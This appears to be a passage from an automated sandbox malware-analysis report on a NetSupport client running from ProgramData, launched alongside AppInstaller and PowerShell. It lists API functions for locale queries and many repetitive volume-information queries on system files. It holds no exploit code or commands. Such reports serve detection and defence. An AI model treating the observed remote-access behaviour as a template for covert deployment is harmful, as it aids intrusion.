Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Progman
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Progman<

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	32_2_111700E5
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_11170376
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	32_2_11170419
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoA,	32_2_11167A6E
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	32_2_1116FFE3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_1116FEEE
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	32_2_1117008A
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_111703DD
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	32_2_111702B6
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	32_2_6BEE0F39
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	32_2_6BEE02AD
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	32_2_6BEE2218
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_6BEE21DC
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_6BEE2175
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: EnumSystemLocalesA,	32_2_6BEE2151
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	32_2_6BEE2089
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	32_2_6BEEDB7C
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	32_2_6BEDFAE1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	32_2_6BEE1EB8
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	32_2_6BEE1E5D
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	32_2_6BEE1DB6
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_6BEE1CC1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoA,	32_2_6BEEDC99
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	32_2_6BEEDC56
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	32_2_6BEE1257
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	32_2_6BEE1680

Queries the volume information (name, serial number etc) of a device

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{10030ca7-2d34-4b5d-ab65-42a8a50302a9}_temp.pri VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Workflow.ServiceCore.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
